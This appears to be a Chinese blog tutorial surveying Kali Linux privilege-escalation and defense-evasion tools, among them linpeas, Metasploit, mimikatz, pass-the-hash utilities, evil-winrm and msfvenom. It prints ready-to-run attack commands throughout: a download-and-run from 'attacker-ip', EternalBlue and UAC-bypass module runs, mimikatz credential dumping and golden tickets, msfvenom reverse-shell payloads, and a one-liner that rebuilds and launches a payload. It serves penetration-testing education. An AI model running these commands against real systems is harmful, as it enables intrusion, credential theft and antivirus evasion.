kali 基础介绍(Privilege Escalation、Defense Evasion)

文章目录

本文主要介绍 kali 的Privilege Escalation、Defense Evasion的相关工具的具体作用。本文仅限于日常学习和技术交流。不得利用文章涉及的技术点进行违法活动。

一、Privilege Escalation(权限提升)

图中展示了 Kali Linux 系统中五个与权限提升(Privilege Escalation)**和**渗透测试密切相关的工具。这些工具主要用于在攻陷目标系统后,进一步挖掘系统配置漏洞,以获取更高权限(如从普通用户提升至 root 或 Administrator)。

(一)linpeas

作用 :Linpeas 是 PEASS-ng 工具集的一部分,专用于 Linux/Unix 系统的权限提升检查
功能

  • 自动化扫描系统配置、文件权限、环境变量、可执行文件、SUID/SGID 位、计划任务等。

  • 识别常见的提权路径,如不安全的文件权限、可写的服务二进制文件、内核漏洞提示。

  • 输出结果采用颜色编码(红/黄/绿),便于快速识别高风险项。
    常用命令

  • 直接本地运行:

    bash 复制代码
    ./linpeas.sh
  • 从远程下载并执行(需 Python HTTP 服务):

    bash 复制代码
    wget http://attacker-ip:8000/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh

(二)metasploit-framework

作用 :Metasploit 是全球最主流的渗透测试框架 ,在权限提升(Privilege Escalation)环节中扮演核心角色。它通过模块化设计,结合系统漏洞、配置缺陷或第三方软件弱点,帮助攻击者从普通用户权限提升至管理员(如 Windows SYSTEM 或 Linux root)权限。。
功能

  • 提供大量预置的漏洞利用模块(Exploits)和载荷(Payloads)。
  • 支持生成各种格式的恶意文件(如 Windows 可执行文件、Linux Shellcode)。
  • 通过 Meterpreter 会话实现高级控制,如文件操作、屏幕截图、键盘记录、权限提升辅助。

提权操作流程详解

1. 获取初始会话

在提权前,需先通过漏洞利用模块(Exploit)获取目标系统的 Meterpreter 会话。例如:

bash 复制代码
use exploit/windows/smb/ms17_010
set RHOSTS 192.168.1.100
set LHOST 192.168.1.200
exploit

成功后会获得一个 Meterpreter 会话,可通过 sessions 命令查看。

2. 信息收集与环境侦察

在 Meterpreter 会话中,先执行基础信息收集,判断提权路径:

  • sysinfo:查看操作系统版本、架构、补丁情况。
  • getuid:查看当前用户权限(如 NT AUTHORITY\NETWORK SERVICE)。
  • ps:列出当前运行进程,寻找高权限进程(如 explorer.exesvchost.exe)。
  • shell:进入系统命令行,执行 whoami /allnet localgroup administrators 等命令。
3. 选择提权模块

Metasploit 提供大量本地提权模块,可通过 search 命令按平台或关键词筛选:

bash 复制代码
search type:exploit platform:windows local

常见提权模块包括:

  • exploit/windows/local/bypassuac:绕过 Windows UAC 机制,提升至管理员权限。
  • exploit/windows/local/ms16_032_secondary_logon_handle:利用 Windows 内核漏洞提权。
  • exploit/multi/local/phpmyadmin_privilege_escalation:利用第三方软件(如 phpMyAdmin)漏洞提权。
4. 设置并执行提权

选择模块后,设置会话 ID 和目标进程,执行提权:

bash 复制代码
use exploit/windows/local/bypassuac
set SESSION 1
set PROCESSNAME explorer.exe
exploit

若成功,会话将升级为高权限上下文(如 NT AUTHORITY\SYSTEM)。

5. 验证提权结果

提权后,再次执行:

bash 复制代码
getuid

若输出 NT AUTHORITY\SYSTEMroot,则表示提权成功。

6. 后渗透操作

提权成功后,可进一步执行:

  • hashdump:导出系统密码哈希。
  • screenshare:实时屏幕共享。
  • keyscan_start:记录键盘输入。
  • upload/download:上传/下载文件。

注意事项

  • 权限上下文:提权模块通常需要目标系统存在可利用的漏洞或配置缺陷。
  • 进程选择 :选择高权限进程(如 explorer.exe)可提高提权成功率。
  • 防杀软规避 :部分提权模块可能被杀毒软件检测,建议结合 msfvenom 生成免杀载荷。

(三)peass

作用 :Peass 是 PEASS-ng 工具集的总称 ,涵盖 Linux、Windows 和 macOS 系统的权限提升检查。
功能

  • 集成了 linpeas(Linux)、winpeas(Windows)和 macpeas(macOS)。

  • 自动化检测系统错误配置、敏感文件泄露、可利用的服务权限等。

  • 提供清晰的提权建议和漏洞利用思路。
    常用命令

  • 运行 PEASS-ng 主程序(需 Python 环境):

    bash 复制代码
    python3 peass.py
  • 或直接调用子模块(如 linpeas 或 winpeas)。

(四)unix-privesc-check

作用 :这是一个专为 Unix/Linux 系统设计的权限提升检查工具
功能

  • 扫描系统中的文件权限、SUID/SGID 位、可写目录、环境变量、服务配置等。

  • 检测是否存在可被利用的配置错误,如可写的服务脚本、不安全的 PATH 变量。

  • 输出详细报告,帮助安全人员修复漏洞或攻击者寻找提权机会。
    常用命令

  • 运行快速扫描:

    bash 复制代码
    unix-privesc-check standard
  • 运行详细模式扫描:

    bash 复制代码
    unix-privesc-check detailed

(五)winpeas

作用 :Winpeas 是 PEASS-ng 工具集的 Windows 版本,专用于 Windows 系统的权限提升检查
功能

  • 扫描 Windows 服务、注册表、DLL 劫持机会、可写目录、计划任务、凭证存储位置。

  • 检测是否存在可利用的权限配置错误,如服务权限过松、可写的服务二进制文件。

  • 支持多种输出格式(彩色终端、JSON、HTML)。
    常用命令

  • 运行 Windows 版本(需 .NET 环境):

    powershell 复制代码
    .\winpeas.exe
  • 或使用 BAT 版本(无需 .NET):

    cmd 复制代码
    winpeas.bat

二、Defense Evasion(防御规避)

图中展示的是 Kali Linux 系统中一系列用于防御规避的工具,它们在红队演练和后渗透阶段(Post-Exploitation)中扮演核心角色。这些工具主要用于提取系统凭据、传递哈希、远程控制、网络扫描和服务利用。

(一)Pass-the-Hash

作用 :Pass-the-Hash 是一种利用 NTLM 哈希值而非明文密码进行身份验证的横向移动技术。
功能

  • 允许攻击者在获取目标账户的 NTLM 哈希后,无需明文密码即可模拟用户会话。

  • 适用于内网横向移动,尤其在凭证复用或无法获取明文密码时。

  • 可绕过基于密码日志审计的安全设备,因为使用的是哈希而非明文。
    常用命令

  • 使用 psexec 进行哈希传递:

    bash 复制代码
    psexec.py -hashes LM:NT domain/user@target-ip
  • 使用 CrackMapExec 扫描并批量利用:

    bash 复制代码
    crackmapexec smb 192.168.25.0/24 -u administrator -H 627782b7274e323941c9418399460d5b

(二)evil-winrm

作用 :Evil-WinRM 是一个基于 Ruby 开发的开源工具,用于通过 WinRM 服务获取远程 Windows 主机的 PowerShell 交互会话。
功能

  • 支持多种认证方式:纯文本密码、NTLM 哈希、SSL 加密、密钥登录。

  • 提供文件上传/下载、PowerShell 脚本执行、服务枚举等后渗透功能。

  • 可配合"Bypass-4MSI"等技术绕过 AMSI 保护,实现无文件攻击。
    常用命令

  • 连接远程主机:

    bash 复制代码
    evil-winrm -i 192.168.1.100 -u Administrator -p '密码'
  • 使用哈希登录:

    bash 复制代码
    evil-winrm -i 192.168.1.100 -u Administrator -H 'NTLM哈希'

(三)impacket-scripts

作用 :Impacket 是一个强大的 Python 库,用于构造和解析网络协议数据包,其脚本集(如 psexec、wmiexec、smbclient)广泛用于渗透测试。
功能

  • 提供多种远程执行方式:通过 SMB、WMI、RPC 等协议执行命令。

  • 支持哈希传递、票据传递(Pass-the-Ticket)、Kerberos 滥用。

  • 可用于横向移动、服务枚举、文件传输。
    常用命令

  • 使用 WMI 执行命令:

    bash 复制代码
    wmiexec.py -hashes LM:NT domain/user@target-ip "ipconfig"
  • 使用 SMB 复制文件:

    bash 复制代码
    smbclient.py -hashes LM:NT domain/user@target-ip

(四)mimikatz

作用 :Mimikatz 是 Windows 内存凭据提取工具,可从 LSASS 进程中dump出明文密码、NTLM 哈希、Kerberos 票据等。
功能

  • 提取系统中所有用户的明文密码(需修改注册表支持)、哈希值和令牌。

  • 支持"Pass-the-Hash"、"Pass-the-Ticket"、"Golden Ticket"等高级攻击。

  • 可用于本地提权、域控攻击、横向移动。
    常用命令

  • 提升调试权限:

    bash 复制代码
    privilege::debug
  • 提取内存中的凭证:

    bash 复制代码
    sekurlsa::logonpasswords
  • 生成黄金票据:

    bash 复制代码
    kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-... /krbtgt:hash

(五)netexec

作用 :Netexec 是一个模块化的网络攻击框架,支持多种协议(SMB、SSH、WinRM、LDAP 等)的批量凭证测试和命令执行。
功能

  • 类似于 CrackMapExec,但更注重模块化和可扩展性。

  • 支持哈希传递、明文密码爆破、服务扫描。

  • 可用于内网资产发现、凭证喷洒、横向移动。
    常用命令

  • 扫描 SMB 服务并测试凭证:

    bash 复制代码
    netexec smb 192.168.1.0/24 -u admin -p password
  • 使用哈希进行批量攻击:

    bash 复制代码
    netexec smb 192.168.1.0/24 -u admin -H 'NTLM哈希'

(六)passing-the-hash

作用 :这是 Pass-the-Hash 工具集的另一个实现,通常指代 pth-toolkit,用于在 Linux 环境下模拟 Windows 的哈希传递攻击。
功能

  • 允许在 Linux 上使用 NTLM 哈希访问 Windows 资源(如 SMB 共享、WMI)。

  • 可用于从 Linux 攻击机对 Windows 域环境进行横向移动。

  • 支持多种协议和认证方式。
    常用命令

  • 挂载 SMB 共享使用哈希:

    bash 复制代码
    pth-smbspool //target-ip/share -U user%LM:NT
  • 通过 WMI 执行命令:

    bash 复制代码
    pth-wmic -U domain/user%LM:NT //target-ip "ipconfig"

(七)smbmap

作用 :SMBMap 是一个用于枚举 SMB 共享和文件权限的工具,支持匿名访问、凭证测试和命令执行。
功能

  • 快速识别内网中开放 SMB 服务的主机和可访问共享。

  • 支持文件上传、下载、删除和命令执行(通过 SMB 管道)。

  • 可用于权限提升(如写入启动项、服务二进制文件)。
    常用命令

  • 枚举共享:

    bash 复制代码
    smbmap -H 192.168.1.100
  • 使用凭证访问:

    bash 复制代码
    smbmap -H 192.168.1.100 -u admin -p password
  • 执行命令:

    bash 复制代码
    smbmap -H 192.168.1.100 -u admin -p password -x "ipconfig"

(八)xfreerdp

作用 :Xfreerdp 是 FreeRDP 的图形化客户端,用于连接 Windows 远程桌面(RDP)。
功能

  • 支持凭证登录、哈希传递、智能卡认证。

  • 可用于远程控制、会话劫持、图形化操作。

  • 支持多显示器、剪贴板共享、驱动器映射等高级功能。
    常用命令

  • 连接 RDP:

    bash 复制代码
    xfreerdp /u:admin /p:password /v:192.168.1.100
  • 使用哈希登录:

    bash 复制代码
    xfreerdp /u:admin /d:domain /pth:NTLM哈希 /v:192.168.1.100

(九)exe2hex

作用 :Exe2hex 是一个将 Windows 可执行文件(EXE)转换为十六进制格式的工具,便于在 Linux 环境下通过命令行传输和执行。
功能

  • 将 EXE 转换为 hex 字符串,避免传输过程中被杀毒软件拦截。

  • 可在目标 Windows 主机上通过 PowerShell 或 cmd.exe 还原并执行。

  • 常用于无文件攻击或绕过上传限制。
    常用命令

  • 转换文件:

    bash 复制代码
    exe2hex -i payload.exe -o payload.hex
  • 在 Windows 上还原并执行:

    powershell 复制代码
    $hex = Get-Content payload.hex; $bytes = $hex -split ' ' | % { [byte]("0x$_") }; [io.file]::WriteAllBytes("payload.exe", $bytes); Start-Process payload.exe

(十)macchanger

作用 :Macchanger 是一个用于修改网络接口 MAC 地址的工具,常用于网络匿名化和绕过基于 MAC 的访问控制。
功能

  • 可设置随机 MAC 地址、指定特定 MAC 地址。

  • 支持无线网卡、以太网卡。

  • 可用于规避网络监控、伪装设备身份。
    常用命令

  • 查看当前 MAC:

    bash 复制代码
    macchanger -s eth0
  • 设置随机 MAC:

    bash 复制代码
    macchanger -r eth0
  • 设置指定 MAC:

    bash 复制代码
    macchanger --mac=00:11:22:33:44:55 eth0

(十一)msfvenom

作用 :Msfvenom 是 Metasploit 框架的载荷生成器,用于创建各种格式的恶意文件(如 EXE、DLL、Shellcode),用于渗透测试。
功能

  • 支持多种平台(Windows、Linux、Android)和架构(x86、x64)。

  • 可生成反弹 Shell、绑定 Shell、 Meterpreter 载荷。

  • 支持编码、混淆、加密,以绕过杀毒软件检测。
    常用命令

  • 生成 Windows 反弹 Shell:

    bash 复制代码
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.200 LPORT=4444 -f exe > payload.exe
  • 生成无文件 PowerShell 载荷:

    bash 复制代码
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.200 LPORT=4444 -f psh -o payload.ps1
相关推荐
一次旅行2 天前
网络安全总结
安全·web安全
red1giant_star2 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透2 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全
一名优秀的码农2 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
Libraeking2 天前
05 安全边界:MCP Server 的权限沙箱与敏感数据保护
安全
努力的lpp2 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
龙仔7252 天前
在麒麟V10服务器安全加固,sshd防暴力破解加固,实现“密码错误3次封IP”的需求
服务器·tcp/ip·安全
努力的lpp2 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
上海云盾-小余2 天前
即时通讯App的DDoS防御架构设计
运维·服务器·安全
上海云盾商务经理杨杨2 天前
2025年重大网络安全事件回顾与趋势分析
网络·安全·web安全